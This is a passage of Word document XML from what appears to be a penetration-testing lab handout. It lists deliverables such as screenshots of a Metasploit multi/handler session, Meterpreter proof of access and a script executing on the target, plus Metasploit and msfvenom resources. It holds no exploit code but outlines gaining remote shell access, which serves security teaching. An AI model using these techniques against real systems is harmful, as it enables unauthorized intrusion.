        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the multi/handler catching the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB95A9B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of a Meterpreter command proving access (sysinfo / getuid).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D5CD44" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of your uploaded script executing on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C308530" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>• A brief report: the access gained, what you demonstrated, and the remediation, for Helen Cho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C727A52" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Terminal Activity Log: on the attacker container, run  history 10 &gt; lab21.txt , then last -n 10 &gt;&gt; lab21.txt , then  cat lab21.txt  — screenshot the output of that final cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB8D9A" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8. Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620449D9" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Up to five curated resources for this lab, including video walkthroughs where useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992023E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Metasploit Unleashed (Offensive Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CDA64" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• msfvenom documentation (Rapid7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58030E4F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Meterpreter command reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0848E0B1" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK — Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0A0AB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• [Video] msfvenom &amp; multi/handler</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="3B258724" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4E3CC"/>
          </w:tcPr>
          <w:p w14:paraId="3A80AD11" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>⚠ Reporting note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757C430F" w14:textId="77777777" w:rsidR="00E656F4"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29BE511D" w14:textId="77777777" w:rsidR="003472A4" w:rsidRDefault="003472A4"/>
    <w:sectPr w:rsidR="003472A4"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331959">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1699353221">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="936407726">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1673754416">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="342515383">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="634723343">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1335496088">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1474448184">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="5358920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2A4"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AB61FA"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C9221E"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00E656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16FE6"/>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1420</Words>
  <Characters>8096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2026-10-03T03:25:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>